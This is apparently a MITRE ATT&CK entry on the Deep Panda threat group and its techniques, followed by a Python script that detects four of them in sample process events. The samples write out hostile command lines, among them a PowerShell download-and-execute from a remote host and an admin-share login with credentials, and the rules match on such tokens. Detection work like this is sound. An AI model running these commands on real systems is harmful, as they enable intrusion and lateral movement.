Group: Deep Panda, Shell Crew, ...

From ATT&CK
ID: G0009
Aliases: Deep Panda, Shell Crew, WebMasters, KungFu Kittens, PinkPanther, Black Vine

Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications.[1] The intrusion into healthcare company Anthem has been attributed to Deep Panda.[2] This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther.[3] Deep Panda also appears to be known as Black Vine, based on the attribution of both group names to the Anthem intrusion.[4]

Techniques Used

  • PowerShell - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.[1]
  • Web Shell - Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.[5]
  • Windows Admin Shares - Deep Panda uses net.exe to connect to network shares using "net use" commands with compromised credentials.[1]
  • Scripting - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.[1]
  • Regsvr32 - Deep Panda has used regsvr32 to execute a server variant of Derusbi in victim networks.[3]
  • Accessibility Features - Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.[3]
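As an added example, not part of this ATT&CK entry, the Python below turns four of the behaviours listed above (winlogon-spawned shell, net use with explicit credentials, in-memory PowerShell download, regsvr32 loading a DLL outside the system directories) into simple detection rules and runs them over constructed process-creation events; the host names, paths, IP and credential in the sample events are made up.

```python
import re
from typing import Callable, Dict, List

Event = Dict[str, str]  # parent image, process image, command line

SHELLS = {"cmd.exe", "powershell.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

def accessibility_shell(ev: Event) -> bool:
    # Sticky-keys style backdoor: winlogon.exe launching a shell at the logon screen.
    return ev["parent"].lower() == "winlogon.exe" and ev["image"].lower() in SHELLS

def net_use_with_creds(ev: Event) -> bool:
    # "net use" to a share with an explicit /user: credential.
    c = ev["cmdline"].lower()
    return ev["image"].lower() in {"net.exe", "net1.exe"} and " use " in c and "/user:" in c

def powershell_in_memory(ev: Event) -> bool:
    # Download-and-run without touching disk: DownloadString/IEX/encoded command.
    pat = r"downloadstring|downloaddata|\biex\b|invoke-expression|-enc"
    return ev["image"].lower() == "powershell.exe" and bool(re.search(pat, ev["cmdline"], re.I))

def regsvr32_nonsystem_dll(ev: Event) -> bool:
    # regsvr32 registering (executing) a DLL that does not live in a system directory.
    if ev["image"].lower() != "regsvr32.exe":
        return False
    m = re.search(r'([a-z]:\\[^\s"]+\.dll)', ev["cmdline"], re.I)
    return bool(m) and not m.group(1).lower().startswith(SYSTEM_DIRS)

RULES: Dict[str, Callable[[Event], bool]] = {
    "Accessibility Features": accessibility_shell,
    "Windows Admin Shares": net_use_with_creds,
    "PowerShell": powershell_in_memory,
    "Regsvr32": regsvr32_nonsystem_dll,
}

def scan(events: List[Event]) -> Dict[int, List[str]]:
    """Return {event index: [technique names matched]} for events that hit a rule."""
    hits = {i: [n for n, r in RULES.items() if r(ev)] for i, ev in enumerate(events)}
    return {i: names for i, names in hits.items() if names}

# Constructed sample events (not real telemetry); the last two are benign controls.
SAMPLE_EVENTS: List[Event] = [
    {"parent": "winlogon.exe", "image": "cmd.exe", "cmdline": "cmd.exe sethc.exe 211"},
    {"parent": "cmd.exe", "image": "net.exe", "cmdline": r"net use \\FILESRV01\C$ /user:CORP\svc_backup PLACEHOLDER"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
    {"parent": "cmd.exe", "image": "regsvr32.exe", "cmdline": r"regsvr32 /s C:\Windows\Temp\update.dll"},
    {"parent": "explorer.exe", "image": "regsvr32.exe", "cmdline": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
    {"parent": "explorer.exe", "image": "powershell.exe", "cmdline": "powershell Get-Service"},
]

if __name__ == "__main__":
    for i, names in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["cmdline"], "->", names)
```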

Software